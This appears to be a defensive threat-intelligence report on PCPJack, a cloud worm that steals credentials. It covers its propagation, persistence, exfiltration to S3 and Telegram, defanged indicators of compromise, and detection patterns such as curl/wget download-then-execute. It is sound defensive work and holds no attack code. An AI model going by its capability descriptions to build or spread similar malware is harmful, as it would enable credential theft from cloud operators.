Full Report
Cloud attack framework skips cryptomining, harvests financial, messaging, and enterprise credentials for fraud, spam, and potential extortion.
Analysis Summary
# Tool/Technique: PCPJack
## Overview
PCPJack is a sophisticated, cloud-native credential theft framework and worm. Unlike common cloud malware that focuses on cryptocurrency mining, PCPJack is specifically designed to harvest high-value credentials from cloud infrastructure, containers, and developer tools for the purposes of fraud, spam, and extortion. A distinctive feature of this tool is its "eviction" capability, where it actively seeks out and removes artifacts associated with the **TeamPCP** threat actor group.
## Technical Details
- **Type:** Malware framework / Worm
- **Platform:** Linux (targeted at Cloud/Container environments including Docker, Kubernetes, Redis, and RayML)
- **Capabilities:** Credential harvesting, worm-like propagation (internal/external), TeamPCP tool eviction, persistence, and data exfiltration.
- **First Seen:** April 2026
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application
- **TA0003 - Persistence**
- T1543.002 - Create or Modify System Process: Systemd Service
- T1053.003 - Scheduled Task/Job: Cron
- **TA0005 - Defense Evasion**
- T1070 - Indicator Removal
- T1484 - Impair Defenses (Evicting competing malware)
- **TA0006 - Credential Access**
- T1552 - Unsecured Credentials
- T1528 - Steal Application Access Token
- **TA0007 - Discovery**
- T1046 - Network Service Discovery (Cloud scanning)
- **TA0008 - Lateral Movement**
- T1021.004 - Remote Services: SSH
- **TA0010 - Exfiltration**
- T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage (S3) / Telegram
## Functionality
### Core Capabilities
- **Victim Cleanup:** Scans for and terminates processes/containers associated with TeamPCP or PCPCat to ensure exclusive access to the host.
- **Credential Harvesting:** Targets specific environment variables, config files, and databases to steal keys for AWS, Azure, GCP, Slack, databases, and financial services.
- **Worm Propagation:** Uses `worm.py` and `cloud_scan.py` to scan both the internal network and external cloud IP ranges for vulnerable services (e.g., Redis, Kubernetes, RayML).
- **Environment Setup:** Automatically installs Python 3.6+ and necessary libraries (`requests`, `cryptography`, `pyarrow`) if they are missing on the victim host.
### Advanced Features
- **Asymmetric Encryption:** Uses an attacker-controlled public key to encrypt stolen data natively before exfiltration, ensuring the data remains protected during transit.
- **Modular Architecture:** Consists of specialized Python modules for lateral movement, cloud scanning, and parsing specific credential formats.
- **Smart Target Selection:** Includes a blocklist check against the operator's IP to avoid accidental self-infection.
## Indicators of Compromise
### File Hashes (SHA-1)
- `a20a9924d92c2b06d82b79c0fe87451c650cabec` (bootstrap.sh)
- `0b86434ca5145636d745222f7e49c903ce6ef538` (worm.py)
- `01cebc48016395e284ac76afc1816f143ee3e7b6` (cloud_scan.py)
- `fed52a4bbac7b5b6ae4f76cab3eadd67e79227e3` (lateral.py)
### File Names / Paths
- `/var/lib/.spm/` (Working directory)
- `sys-monitor.service` (Systemd persistence)
- `harvest.jsonl` (Local store for stolen credentials)
- `bootstrap.sh`, `monitor.py`, `parser.py`
### Network Indicators
- `hxxps://spm-cdn-assets-dist-2026[.]s3[.]us-east-2[.]amazonaws[.]com` (Payload hosting)
- `161.97.186[.]175` (C2/Scanning)
- `213.136.80[.]73` (C2/Scanning)
- `38.242.204[.]245` (C2/Scanning)
### Behavioral Indicators
- Sudden installation of Python virtual environments in hidden directories.
- Mass outbound scanning on ports 6379 (Redis), 10250 (Kubelet), and 8265 (Ray).
- Automated removal of files or containers containing the strings "TeamPCP" or "PCPcat".
## Associated Threat Actors
- Potentially a former operator/affiliate of **TeamPCP**, indicated by deep familiarity with their internal tooling and a desire to displace the group's presence.
## Detection Methods
- **Behavioral:** Monitor for unexpected shell scripts downloading files from S3 buckets via `curl` or `wget` followed by immediate execution.
- **Process Monitoring:** Detect `systemd` services or `cron` jobs originating from hidden directories (e.g., `/var/lib/.spm/`).
- **Network:** Alert on high-volume internal or external port scanning originating from container workloads.
## Mitigation Strategies
- **Secrets Management:** Avoid storing plaintext credentials in environment variables or configuration files; use dedicated secrets managers (AWS Secrets Manager, HashiCorp Vault).
- **Network Segmentation:** Implement strict egress filtering for cloud workloads to prevent unauthorized connections to unknown S3 buckets or Telegram APIs.
- **Infrastructure Hardening:** Ensure Kubernetes APIs, Docker sockets, and Redis instances are not exposed to the public internet without strong authentication.
## Related Tools/Techniques
- **PCPcat:** The toolset associated with TeamPCP that PCPJack specifically targets for removal.
- **CloudVAMP:** Similar cloud-focused worms (though PCPJack is distinct for its lack of cryptomining).